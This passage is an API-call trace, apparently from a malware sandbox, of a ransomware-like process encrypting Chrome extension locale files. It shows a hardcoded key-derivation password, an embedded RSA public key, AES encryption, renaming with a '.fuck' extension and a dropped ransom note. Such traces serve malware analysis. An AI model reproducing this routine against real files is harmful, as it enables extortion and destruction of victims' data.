(lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.242] CryptHashData (hHash=0x2984760, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.242] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x2984760, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2983fe0) returned 1 [0252.242] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.242] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.242] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298bb58) returned 1 [0252.243] CryptImportPublicKeyInfo (in: hCryptProv=0x298bb58, dwCertEncodingType=0x1, pInfo=0x2993470*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29934a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29934a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984e60) returned 1 [0252.243] CryptEncrypt (in: hKey=0x2984e60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.243] CryptEncrypt (in: hKey=0x2984e60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298bad0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298bad0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.243] WriteFile (in: hFile=0x5d64, lpBuffer=0x298bad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298bad0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.245] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.247] CryptEncrypt (in: hKey=0x2983fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.247] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.247] CloseHandle (hObject=0x5d5c) returned 1 [0252.247] CloseHandle (hObject=0x5d64) returned 1 [0252.247] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json"), bFailIfExists=0) returned 1 [0252.252] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json", dwFileAttributes=0x0) returned 1 [0252.252] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.gsg")) returned 1 [0252.254] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.fuck")) returned 1 [0252.255] CryptDestroyHash (hHash=0x2984760) returned 1 [0252.255] CryptDestroyKey (hKey=0x2983fe0) returned 1 [0252.255] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.255] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.255] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.256] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\readme_back_files.htm")) returned 0xffffffff [0252.256] AreFileApisANSI () returned 1 [0252.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0252.256] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.257] GetFileType (hFile=0x5d60) returned 0x1 [0252.257] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.258] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.258] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.258] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.259] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.259] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.259] GetLastError () returned 0x0 [0252.259] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json")) returned 0x20 [0252.260] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json", dwFileAttributes=0x80) returned 1 [0252.261] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.261] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.263] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.263] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.266] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.266] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.266] CryptHashData (hHash=0x29846a0, pbData=0x28cb788, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.266] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2983fe0) returned 1 [0252.266] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.267] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.267] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298b718) returned 1 [0252.267] CryptImportPublicKeyInfo (in: hCryptProv=0x298b718, dwCertEncodingType=0x1, pInfo=0x2993880*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29938b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29938b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984a20) returned 1 [0252.267] CryptEncrypt (in: hKey=0x2984a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.267] CryptEncrypt (in: hKey=0x2984a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298b8b0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298b8b0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.268] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298b8b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298b8b0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.269] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.271] CryptEncrypt (in: hKey=0x2983fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.271] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.271] CloseHandle (hObject=0x5d64) returned 1 [0252.271] CloseHandle (hObject=0x5d5c) returned 1 [0252.271] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json"), bFailIfExists=0) returned 1 [0252.276] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json", dwFileAttributes=0x0) returned 1 [0252.277] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json.gsg")) returned 1 [0252.278] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json.fuck")) returned 1 [0252.279] CryptDestroyHash (hHash=0x29846a0) returned 1 [0252.279] CryptDestroyKey (hKey=0x2983fe0) returned 1 [0252.279] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.279] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.279] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.280] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\readme_back_files.htm")) returned 0xffffffff [0252.280] AreFileApisANSI () returned 1 [0252.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3af0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 158 [0252.280] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.281] GetFileType (hFile=0x5d60) returned 0x1 [0252.281] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.282] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.282] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.283] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.283] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.283] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.283] GetLastError () returned 0x0 [0252.283] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json")) returned 0x20 [0252.283] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json", dwFileAttributes=0x80) returned 1 [0252.284] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.284] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.285] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.286] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.289] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.289] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.289] CryptHashData (hHash=0x29846a0, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.289] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2983fe0) returned 1 [0252.289] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.289] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.289] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298b828) returned 1 [0252.290] CryptImportPublicKeyInfo (in: hCryptProv=0x298b828, dwCertEncodingType=0x1, pInfo=0x29936e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2993710*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2993718*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984da0) returned 1 [0252.290] CryptEncrypt (in: hKey=0x2984da0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.290] CryptEncrypt (in: hKey=0x2984da0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298c2c8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298c2c8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.290] WriteFile (in: hFile=0x5d64, lpBuffer=0x298c2c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298c2c8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.292] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.294] CryptEncrypt (in: hKey=0x2983fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.294] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) 